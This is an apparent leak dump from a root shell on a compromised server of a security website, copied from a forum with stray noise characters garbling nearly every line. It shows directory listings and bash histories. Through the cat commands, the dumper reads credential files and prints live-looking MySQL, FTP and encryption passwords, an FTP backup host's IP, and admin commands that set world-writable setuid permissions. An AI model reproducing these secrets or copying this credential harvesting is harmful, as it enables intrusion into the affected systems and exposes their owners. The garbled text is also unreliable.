#####################################################+ I( l/ I1 w) Y% b
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #% H- L5 P( z6 h
# |__| [__ | |__| | |__| | | | [__ | |__| #
0 T$ G; P1 i( L! T# | | ___] | | | |___ | | \/ | ___] | | | #! P9 M" x! c8 |
# ## X& K" F+ T- p+ j$ \
#####################################################) V" E$ z1 a0 ]
# #
) r4 R. Y- o" M3 A2 ]" @9 O# Admin Contact - 链接标记support@secureservertech.com #4 H9 }- d0 M2 B- T. p+ V& m$ N
# #
3 V `( x! X1 Z* v- N0 i q# Available ShortCuts #
5 ?7 E q% g q( N# #
l3 L+ a, R) I8 P$ U' b! p- |# nst - list active connections #
( g- A# S8 X: o0 R# ddos - shows how many times each ip is connected #
; z: G+ N% ]( I( v; ]. c" P1 O# ltr - restart the webserver #) k5 R4 {5 A5 w; w) @1 d V8 W
# phpc - edit the php config file #7 u; Y! O0 @" l1 S' d
# htc - edit the webserver configuration file #
4 G6 f! u) q! C# up - uptime #
6 L2 x" b3 l# C6 O4 n3 C# etd - edit the motd of the day file #
* n! b9 v, ? T/ d p! _# htr - start and restart apache if needed #2 J) u, Y1 J/ l. d& D; z1 K% Z
# syng - shows active SYN_RECV connections #( Z1 }0 C+ ~6 D' t" j1 r
# synd - syn flood blocker - “synd -h” for usage #
0 Q8 _- K" G( b% ^/ \. ~' j( ~#####################################################
+ \; L ?3 ], r& c Q& K4 K# NOTES: #: K* L4 W& P. X! n" t2 f
# Last Upgrade - 12-08-2008 by JF #
! x: b' i# r9 O7 Q1 V# My.cnf/Mysql Optimization - 1-28-09 # W3 J2 W- |5 l- c
# #
% C' h4 J! J: U+ ?! T! e4 B# #
% m. B, R- A" Y" }! M) ?# #
& ~# c8 V! U: s1 X* |4 y1 O#####################################################
" j" ]& ^! ^9 C9 f6 l8 j* _' G$ r) p! _$ e% z/ T1 T/ t
sh-3.2# lastlog | grep -v Never& C1 ^1 Q" {4 S* j% Q1 L
Username Port From Latest
( a6 x: ^! W! w2 r$ E2 ~root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009) g ~' K1 J) ?+ a! k
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 20086 @* H+ X' j. ]6 L
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
+ n) e/ c z+ wastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
. X% y( J& j* L* @: Q) j, a/ {; |' M/ l( Q- u8 Q ~
sh-3.2# ls -la
, R4 K6 F; t4 G l: ^8 ^( [total 4533762 A! s! n' b A D- A
drwxr-x— 15 root root 4096 Jun 4 08:40 .1 z) g3 P+ _# b! l( H
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
6 l; A, _# H" y$ F-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip( Y7 l4 N, N0 n: h6 S! s$ T3 U
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg6 Z5 Y2 T$ h0 w8 w0 }7 f
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history% g7 |) c5 J7 d a3 R, j: a
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout! [$ K v/ k2 L
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile9 d/ d9 b# \% I! M l: _
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc2 K7 `- ]' z6 p2 L2 i
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh' j/ p! f: H$ i! F& w0 F
-rw-r–r– 1 root root 1327 Nov 29 2007 cert% J( g" h8 h& a" G
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
7 U0 @1 d5 C4 i- a+ p5 e$ gdrwxr-xr-x 4 root root 4096 May 20 2008 .cpan* p0 e6 ?. N- ^, _
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
* j. h/ V2 t3 D7 J; z1 ~-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
$ A0 @7 C/ w% w& o, D K) l0 k! kdrwx—— 2 root root 4096 Oct 28 2007 .elinks
3 k* ?3 |! K6 j1 \* ydrwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
5 C7 f$ t2 Z9 ^' x2 X/ _9 D& N6 n-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
, N: D% t% \+ I-rw——- 1 root root 0 Apr 16 13:19 .history4 o3 r) P$ S4 o; l0 j
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log+ L6 U- g; _5 o2 B3 o
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
$ y' E* G$ U' c- s: d7 x( y, ^-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh$ p6 t' f5 }& b1 K
-rw——- 1 root root 35 Jun 2 14:23 .lesshst
* h. j# v/ e E; A0 cdrwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp1 J8 z/ p% N; v1 F
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec8 [" m3 }7 t6 j7 Q
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz" U. }. W2 b2 E6 Z
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
6 c, Z0 I x8 P9 |-rwx—— 1 root root 760 Sep 18 2008 lp# N K$ i% w% L
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
2 \2 v$ G: X1 G+ Q2 B2 X5 y& I8 D/ M-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz4 Q9 @ _7 @' k
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
0 t, ~& k6 V0 V, Odrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
8 [) T' P) e$ ^& ?) ?-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
# e1 Y" Z* p" T* Mdrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.39 L- p- J( M' E* ~
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
6 L3 D* O3 M( F/ {2 [-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
+ |& a D2 x& ?8 K% _# ~* Y-rw——- 1 root root 41 Oct 19 2007 .my.cnf
6 n) s. o# H% Q" c-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history2 Q; ?% I, R% b& S$ M3 ?) A0 ^
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport- {' C O6 G! X1 i0 U% H& E5 L
-rw——- 1 root root 41 May 20 2008 .mytop# ?$ X* @9 K( A7 W
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
+ ~1 ~8 U$ A2 @, F-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
O$ M2 B; x4 s0 H. l3 adrwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp# w; p# I0 ~& R& _
-rw——- 1 root root 1462 Sep 21 2007 opt.php
3 z' a* \% c. i# d9 v-rw-r–r– 1 root root 3371 Sep 22 2007 p
0 h) d7 Q8 e, S-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
" {& ^, y) V( m$ d# H( R }-rw——- 1 root root 1024 Feb 3 21:32 .rnd8 D2 t# ?' j; z: k; x+ A
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
5 w D: v+ N* b( E-rw-r–r– 1 root root 887 Nov 28 2007 server.key
; W1 F+ Z% J0 O2 odrwx—— 2 root root 4096 Oct 10 2008 .ssh
6 ^" v5 ]" E. Y5 E$ g-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat5 y9 [; N S- z p+ E. N ~
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc9 j! ^7 ]4 F' m* a5 H) t B
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
& V' Q v$ @9 B-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1: ^, K0 ~4 B b/ C/ }% B
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
8 j2 g0 O# j( _8 z-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh$ d4 q+ j% }! k- I/ L
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0+ o, s- [' {, Y
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2# F2 C# R& K) \& ?3 z2 v
-rw——- 1 root root 12997 May 16 2008 .viminfo
. t6 M6 N7 V" E0 w: J K
* U6 _- ]4 F0 M' V. Ksh-3.2# cat .bash_history y9 m) s6 p& }+ a6 ]9 k
[snip] O' \" f. Q# M% ^" ~( e
wget cp4sst.com/sstlinux.tar.gz
. v/ ^8 A6 r l: `, Ztar zxvf sstlinux.tar.gz
! M3 Y' H3 k- f! B: A! V( D4 bcd linux-2.6.27.10# z7 V2 ^7 f5 U0 _% Z+ o. |6 }
sh install.sh# g) t5 Y0 X/ D7 w" ]
make bzImage ; make modules ; make modules_install ; make install
( \. E; p- o. v M6 xmake clean
) _) G. ~- u. Y# o7 Q* y" R3 l* Qservice mysqld restart
: N( M; ^$ r4 j& A[snip]
V: n! b1 a6 p1 pcd /usr/sbin/, l; X* }6 e- J6 r/ I' l
chmod 4777 traceroute; e. l2 v* Q: e2 _5 l0 ?! ?
chmod 4777 ping
) n& a# {/ w- g/ o* Ytraceroute -I 链接标记[url]www.astalavista.ch[/url]6 c) q. p% q8 j* N& q' B9 l' T, T% ]
[snip]6 m& W: g! P" b6 a* g
vi /etc/csf/csf.conf ^" }" {' ^5 F! G- V' v
traceroute google.ch. O- Y6 D5 |6 i$ p% {
service csf restart
. k1 [2 M: l7 _5 u; x) ztracert google.ch, d' i. K( {2 s
service csf restart
1 ?% A6 e2 ~$ e: Straceroute 链接标记[url]www.google.ch[/url]5 i* M6 n) W; W1 m7 m- o+ ?
tracert 链接标记[url]www.google.ch[/url]
8 t5 i1 `: ?- Z6 C% ?traceroute 链接标记[url]www.google.ch[/url]
& {3 a* d. B, d. Mlocate traceroute
" n' s% O% C$ h: o2 Gchown 4755 /bin/traceroute
9 L6 R4 n% Y8 q) T& |; p0 n F5 Ichown 4777 /bin/traceroute& F6 h) {% F1 ^
locate ping$ O- k/ T2 ^7 m% W7 ^: p- B
chown 4755 /bin/ping- K+ [( f( Q' h' F
chown 4777 /bin/ping
0 Y3 Q) V2 w5 o4 k) v+ Ycd /bin/6 l! i! o2 y$ Z% T) E9 s8 P( P
ls -ali | grep ping
; c; V4 J, N8 x& j0 @chown root ping6 @& [& y8 q7 ^- M, D! k! b1 A
chmod 4755 ping7 v* p, |1 ^( h8 G* Q8 U
ls -ali | grep traceroute
8 W) c! I( P, x5 u7 [6 P% fchown root traceroute3 h% I1 F) Z$ D; i |! }
chmod 4755 traceroute$ s/ c6 g* I& t t- n0 V/ C
ls -ali | grep traceroute+ c" p" T/ P8 a; Z4 p9 T
traceroute -I 链接标记[url]www.google.ch[/url]
6 v6 H3 o0 K% x1 r: l+ Straceroute 链接标记[url]www.google.ch[/url]
5 H( z3 L X" @ ~ Swhois pmsantos.ch% w- u$ m: S d' F7 y m
[snip]; o0 x+ l' {. O6 M! d% A
mysql -h com_contrexx2_live < /root/defaultp_ports.sql
- K: f& z' r# g: M" P+ b# ]% ?mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
8 s. u6 s. ^( M& }. U0 wmysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql& I0 h+ `( ?8 x
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql B! V! I# H6 c7 Y/ {1 x
top# Z# B+ T4 T0 u, h1 V3 p
ping ssth.ch
4 O& R! I$ @: I; zping asdlkfaljgasd???ljg???lasj.ch
8 p* V7 j' h( ]' L0 W/ i% kping asdlkfaljgasdlasj.ch; o, {3 T. B6 Y% o, e. _
ping 链接标记[url]www.ssth.ch[/url]2 i! g5 F J: h& o: e3 q
ping ssth.ch0 m+ ]5 l/ g z* X
nslookup 链接标记[url]www.google.ch[/url]
6 i, {3 e2 O2 Anslookup 链接标记[url]www.ssth.ch[/url]
$ E% z+ S" q! w% {man nslookup) I% ^5 t4 \; v- {
ping 链接标记[url]www.google.ch[/url]
- U% u3 b1 f. S) Gnslookup 链接标记[url]www.google.ch[/url]6 t# M& N9 G. Z' i9 @' I) h
nslookup 链接标记[url]www.google.ch[/url]% Z0 ^# D1 ]3 [- m2 {' G6 A9 E+ O
nslookup salfjasdlf.ch; n6 a3 g1 T# ]+ L# J& r
[snip]& M7 N. V1 O2 W
openssl passwd -1 sadf, a/ s8 _- e8 A0 ~0 X% E2 ~
openssl passwd -1 5cZNHstdTy
# C: E0 y7 I5 N: K# H( Xmysql
+ C$ E1 u, h2 k% N0 Amysql5 ?- [$ [. M5 K5 N8 P1 I7 ]
locate proftp
, m& u9 W8 k3 D$ L- ovi /etc/proftpd.passwd
6 E' m. s2 b6 m, Xservice proftpd restart
: H& A+ v. _' _1 D( ~% M4 q6 plocate proftpd.conf" g. x9 T& J. _" |& m
vi /etc/proftpd.conf
. [+ d0 B; f" M1 e3 Nvi /etc/proftpd.passwd% O9 H% E q8 [6 ~
service proftpd restart- D. Z! Q$ ~# l
[snip]
) M h. _$ h* z# H% }2 B8 f/bin/sh /home/com/backup_system/backup.sh1 F2 m+ R' ]! h9 K7 f* ^
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin- r. P6 r( ~* C4 V
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
( w! e2 \0 b0 r0 [7 i, D' u* m# b# cmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
6 t3 `: y/ r* X8 els -ali9 T4 M7 `2 {9 X1 _, s$ X4 o
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql, P# q6 I1 }: O4 j& Z
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql0 k) `# j- c8 M
crontab -l
6 z& G R8 d- ^7 L5 |crontab -l- ]# c: }* t5 d4 s
php -q /home/com/public_html/modifications/cronjobs/securitynews.php
0 G% A9 |9 g% k T/home/com/public_html/modifications/cronjobs/exploits.sh5 t' O1 `, h2 ?% G
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
8 e4 h. u! g/ U, N' J8 T& _tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz+ w+ b+ v B" y
cd lsws-4.0.30 x5 U' n+ K: z. c
sh install.sh
. J9 t) c! E. `) m0 [* ^$ w, ?$ G9 [: Nuptime8 y9 n+ c' I, G1 T) V
hdparm -tt /dev/sda
8 t3 _8 F, z+ l( R1 P9 c. R9 Tiostat
( v# P1 E" _. Z8 K% I7 H% D0 Qyum install iostat
1 o0 e9 c3 N( W. b( c3 a. piostat
/ R# o, t$ R2 |! A$ x% u( lwhereis iostat6 `9 M. v8 X& N: }2 f' i
yjm clean all g" g& n7 L* u k( G8 c
yum clean all ; yum -y update9 |; R* y" ?( P. s/ B5 m
iostat
2 z4 E, M1 z2 R: m1 |5 Kyum install systat+ A( ]) C+ V) D/ [- U) S
rpm -qa | grep iostat
6 f3 d! V7 L. g5 q2 L# `0 c) J- g! o2 Vrpm -qa | grep sysstat/ }9 f' s3 T) r6 b
rpm -qa | grep systat; v* v0 j! S& [- A7 ]) P: M3 f. e
dmesg -c
' x' P- V7 `/ d7 i4 |sysctl -p0 A! D3 i& k# M2 U+ Y
uname -r
% F: U' D0 I' N# ]+ D( a5 fcd /usr/src
* |; p" b1 \7 H' I- p9 O) X+ I' Fwget nix101.com/kernels/sstlinux.tar.gz) }/ x7 b, G/ q' U5 J/ R
shutdown -r now& \ F4 C1 p1 U C/ J3 W. T6 R
nano -w /boot/grub/grub.conf- g! S1 R9 a8 V
2 Z8 O' T: R$ X8 {sh-3.2# cat .my.cnf& v0 {- S% V3 U$ W, N6 W* s' V9 x! o
[client]! o* E) Q8 Y& k% r8 _6 g
user=da_admin
1 U3 I8 Q7 ^( w* q% Bpassword=X9dctmRH9 U, Z R) _, o8 Q' z
$ o: ^% b+ k, [4 t3 B: C
sh-3.2# cat /home/com/backup_system/backup.sh
% G# b- V r& a5 c6 e6 c% m#!/bin/sh
3 @* t+ E& M7 o# ]#####################################################################
9 M3 X' H; Z: n# G2 [" Y# #
2 j8 j; z+ X* }# b7 `+ w* Q# incremental backup for astalavista.com #/ ~/ V4 ?& y! p
# #
. J# E/ O% }( z+ |9 o8 ~# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
0 \+ o2 k& B( \7 N# E# #7 R6 M G7 h0 ~) t
#####################################################################
# {& Y0 k/ A3 e& R' J[snip]0 A3 x" e$ |4 E P* r
PROG_DIR=”/home/com/backup_system”;' u q3 A- A; d
BACKUP_DIR=”/home/com/backups”;9 L% Q0 `4 y. Q! x- S U" p
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
7 H0 v# m) _% @/ k3 n# ftp for synology backup server
5 q/ W& V0 E3 s. _) aFTP_HOST=”212.254.194.163″;
+ E: ?/ M7 |0 w. U, D0 YFTP_PORT=”21″;
4 }, X3 V* [$ S' u$ hFTP_USER=”astalavista.com”;7 U. ~$ h0 T8 G: c7 j
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
+ v: I4 N1 ]- `+ j( k& G! mFTP_DIR=”/astalavista.com”;( Q4 X5 g( ]" m/ W+ S4 Q I% X/ r# r
# database
z! g% i1 b8 Q, D p/ qDB_HOST=”localhost”;1 t* Y" e) z, g }, T
DB_USER=”contrexxuser2″;% _; u, G5 c: X% \0 E
DB_PASS=”0fEYNZgXz1pKe”;
. i' ]- X9 ]/ z( u: ~0 L: ?2 ?DB_DATABASE1=”com_contrexx2_live”;) [1 M4 q$ r0 {; T f
DB_DATABASE2=”com_contrexx2″;/ K/ F% r3 W4 x" |5 |
[snip]
$ L/ ?% M V9 P9 s& q7 P6 I. S Iftp -in $FTP_HOST $FTP_PORT <<EOF
. A3 G7 W/ X3 h# s4 ]" j2 z6 lquote USER $FTP_USER/ C( C. T) X& u8 g* M
quote PASS $FTP_PASS, F. I, |: r1 I; K9 m6 F. W
cd $FTP_DIR) z; O$ e- t& |. z( H( h
put $DB_FULLNAME-SQL_Dump.tar
9 v/ w- l' _; a5 \! H o5 eput $BACKUP_FULLNAME-Public_HTML.tar+ |" i5 B( v. I' r9 G
close
3 v% \0 _5 S1 d5 `) Qbye
- w' H1 E3 L9 b$ M- gEOF, j% \' J( @$ \( ]# ^
3 @/ H& v" j5 p. F6 T. ^; x' Z
sh-3.2# cd /home4 s, z. r$ b' c
sh-3.2# ls -la
) G8 h2 e# R Atotal 120' g6 C! y5 G. Y8 t( `
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .9 R& U/ A2 d* z# f7 n$ e
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..' u! v6 l7 s R, p8 V
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
& X6 D7 O/ a( y4 \/ G+ J6 l4 y-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
2 V6 {) F4 ~! c$ {5 l" [5 s-rw——- 1 root root 8192 Jun 3 02:45 aquota.user* D# e" p% z" l/ j' w6 x
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
) X: ^9 d" I: {4 h* o1 i2 n6 Ndrwxr-xr-x 2 root root 4096 Jul 29 2008 backup2 A6 j. d7 j. s4 ]3 K* d* B
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.141614 u. l# X2 M. o( E
drwx–x–x 10 com com 4096 Apr 28 12:40 com
b8 g6 V0 q0 D- }8 Y0 L; K2 L5 d+ Bdrwxr-xr-x 2 root root 4096 May 17 2007 ftp
6 w4 H: @: p% w f# ~% n. _7 Idrwx—— 3 jon jon 4096 Sep 21 2007 jon8 a: A) m' Q* F! N. c8 e
drwx—— 2 root root 16384 Sep 11 2007 lost+found
+ x& E8 D# Z% B7 h+ n+ Edrwxr-xr-x 2 root root 4096 Sep 14 2007 my
1 s- A4 W7 \: g7 g& k; d edrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata, c$ R, {8 r, `" l4 u. \( m# z
drwx—— 2 jon jon 4096 Sep 15 2007 test
9 X0 S2 _% \) M, Mdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp. v6 ^& k1 [ G4 f: H3 N% M
& C+ B# `& L8 |7 Z9 |" X9 ^sh-3.2# cd admin
" m' W2 n3 w6 Q/ }sh-3.2# ls -la8 @0 C, e& V- h
total 1735896
# N' J0 E" M# r/ J, e- }" }drwx–x–x 9 admin admin 4096 Nov 28 2007 .
4 B+ Y6 }4 Q' I: L7 K# zdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
* K6 W0 C, h, L* m% p! _+ |7 edrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
* S% C! } Z8 o0 P: I6 T3 Udrwx—— 2 admin admin 4096 Sep 28 2007 backups: F% R( h5 { \8 f5 Y. t
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history- Q# s" v3 [3 A, u+ |" I' C
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout; c5 k" C$ ^6 y, p
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile* Z8 L3 J6 w2 v& @7 ]
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
3 f+ Z/ v, m/ f5 c% L3 mdrwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
% a5 M# n! X' C( s6 J/ _5 @drwx–x–x 6 admin admin 4096 Sep 21 2007 domains
: F) T; z f! f" fdrwxrwx— 3 admin mail 4096 Sep 21 2007 imap( ~' V0 R. X( N# V( E9 V. v
-rw-r–r– 1 root root 24 Sep 21 2007 info.php2 [# q/ U7 U8 }, Y' q* s
drwx—— 2 admin admin 4096 Sep 21 2007 mail
4 M g0 i0 I2 l$ ?8 u0 V-rw-r–r– 1 root root 716 Nov 28 2007 server.csr* L! ]0 R0 H, e; ?0 U; L1 Z
-rw-r–r– 1 root root 887 Nov 28 2007 server.key, ~8 w) t9 M/ N6 i1 u
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
6 F8 F, K6 i6 y) h/ z8 L-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz B3 z8 K. p: }* M/ F$ L% R
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
1 \/ [6 D7 P7 m5 {1 r7 P' j$ b) \$ P3 h o$ }
sh-3.2# .. h C* u; E8 t1 z, |
sh-3.2# cd jon6 R0 `/ j/ |; ~# o. w
sh-3.2# ls -la" z5 X8 \6 l% f2 u& N) F
total 36$ A1 }9 w l0 n$ C, h8 K) `, w
drwx—— 3 jon jon 4096 Sep 21 2007 .
$ c+ I) F1 M0 {' P z" ^$ }: fdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
- f6 i) _2 `5 Z-rw——- 1 jon jon 53 Sep 21 2007 .bash_history
/ h1 |3 O$ k X" f7 i- }-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout- b. u q/ h H& \6 \/ x$ _8 @4 x4 H
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile6 M: d r& s* _2 I
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc, \/ w8 @; i4 R- i' N
-rw-r–r– 1 root root 24 Sep 21 2007 info.php8 i' D" `; N* w# W# i' D
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
3 U. ~4 r7 a1 R, N A0 q2 b V/ ~- n6 U( M& X; i( `
sh-3.2# cd ..
3 y* |. q5 f/ Psh-3.2# cd test" @$ P; h8 c5 z \ ~+ N6 }
sh-3.2# ls -la1 C/ R- t% {3 ~: Y- O$ r2 o
total 48' d& x, v' d% q
drwx—— 2 jon jon 4096 Sep 15 2007 .# Q0 \0 [8 z5 G: R' w
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
, C6 C9 `2 x* H" T! |-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
2 m/ N# F7 E) `3 `-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
: C* L1 j' _1 F1 |5 q-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
( C7 e1 W$ `. |" ]-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
* I$ \! l. D( ^' u% Ysh-3.2# cat .bash_history
. D, Y0 `0 r8 ~# P/usr/bin/mysqladmin -u root password PoliuJhytg67
$ B4 r0 y: q3 t
% U, [2 z# y$ nsh-3.2# cd ..
5 z C+ o9 k7 L1 v Esh-3.2# cd astanet
+ K& v. d( C$ ]sh-3.2# ls -la- Z! P6 `% R# k- e9 L1 p* A
total 52
$ _2 S- H5 c4 s0 C( Mdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .! R5 k! O* _, X
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
" M2 w( O& @- F3 Q z% ^" r6 fdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth& j! C: h N* k9 z: U, |
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
" s8 x, ]6 m% `-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
( J# Q6 ]& |. s2 d-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
! p. Z9 m ~, K/ N/ a, T/ c* G" ^-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc) W: E5 B# p% d
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains/ f8 }. T4 n0 F& D
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap" |5 e- s+ S' `5 v# `- N6 I, H5 `
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
, P7 j# A; r' S# H8 i' X-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history+ X. |9 L6 i/ X' H' o
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html6 c7 _+ `, T# R7 s4 v' O( g
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
' a1 b* F# j4 h E9 U; Q
L/ n: M' y+ w2 S% B, G; N7 \0 ]sh-3.2# cd auth/
; h) C$ ]7 K! P- J0 hsh-3.2# ls -la
' _' ~ E" g8 l6 T- q3 Ftotal 28
( d9 R' j: @, ~- j% G; v+ a/ ldrwxr-xr-x 2 root root 4096 Dec 23 16:00 .
, k3 o% P' j3 [5 |8 adrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..) t4 M- O6 ^; o) `! P; y6 F( s$ c
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php- I7 L% H, G* o( Q H0 Y
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php; n# r0 Q# v' m* J+ ~
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd
% T* ?. `$ H% u-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting" p1 d+ B( i" ^0 S! J/ R
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
8 v2 \+ t8 P3 S( G! c1 K+ f) C0 F1 B1 {8 K% y0 I+ ]6 J
sh-3.2# cat hackercontest.config.inc.php
; M# ~. k0 ?! J# c. I5 r<?PHP2 S. t+ b3 r; p Z) q
// Variabeln f?r Verbindung zur Datenbank //
( R5 n# }9 E5 x. [3 n$conxHost = ‘localhost’; // MySQL hostname5 H' P9 Z p3 z) m& w
$conxUser = ‘hackercontest’; // MySQL user
! A6 L# Q% \* n( \1 t# Q- {$conxPassword = ‘K6m@7dUc’; // MySQL password% I/ C6 A# E. Y+ W& t; c; b7 P" H
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish8 g, s4 G. W% i% X+ e% \
?>
# z8 P+ ]5 j. o, A& |sh-3.2# cat hosting.config.inc.php# R2 T9 Q) s2 e# Q8 o2 c, d Q$ x8 Q X) z
<?PHP
P: M0 E2 b4 W// Variabeln f?r Verbindung zur Datenbank //& J" K" Y3 l4 n
$conxHost = ‘localhost’; // MySQL hostname6 V' `8 Y- ]* H7 d
$conxUser = ‘hostinguser’; // MySQL user
I* k5 d2 x, ~$conxPassword = ‘cXvB3981′; // MySQL password
9 X' t1 r H4 H d9 @, P5 ?$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
( ?! j7 g0 ?9 |( B& O: v$ q! Q?>
. x+ E/ ~2 z& \# A+ f& s
/ m( U1 k( n) a$ t- Gsh-3.2# cd ..- @! z1 I' f: c+ Z& ]2 p" _" G/ t
sh-3.2# cd com: C# l: y) ]5 } q5 S( u
sh-3.2# ls -la
/ q$ q4 t* O5 f$ `4 U$ V! a: Q' l- Stotal 141208
# D4 q. x0 H8 t) d; kdrwx–x–x 10 com com 4096 Apr 28 12:40 .
" O- u" Y6 u8 ~5 } {5 n" M( Mdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
8 f8 ^5 q$ o9 {$ { i( @) X' X) Gdrwx—— 2 com com 4096 Jun 4 04:04 backups
* u# S Z$ e [4 O+ w-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
